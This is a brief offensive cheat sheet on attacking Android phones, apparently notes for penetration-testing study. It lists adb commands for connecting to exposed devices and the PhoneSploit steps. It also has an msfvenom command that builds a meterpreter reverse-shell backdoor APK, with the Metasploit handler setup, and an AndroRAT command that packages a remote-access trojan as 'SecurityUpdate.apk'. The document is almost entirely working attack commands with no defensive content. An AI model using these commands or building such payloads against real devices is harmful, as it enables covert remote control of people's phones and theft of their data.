Hacking Mobile Platforms
ADB
adb connect <IP>:<ANY_port>
adb shell
PhoneSploit
Run PhoneSploit in terminal > enter the IP and port (5555) and choose the option.
APK using msfvenom
msfvenom -p android/meterpreter/reverse_tcp LHOST=<localhost_IP> LPORT=<localport> --platform android -a dalvik -f raw -o backdoor.apk
msfconsole
>use exploit/multi/handler
>set payload android/meterpreter/reverse_tcp
> set LHOST and LPORTrun
multi/handler
on the above mentioned port
APK using AndroRat
python3 androRAT.py —build -i <IP> -p <port> -o SecurityUpdate.apk
APK Analysis

Last updated
Was this helpful?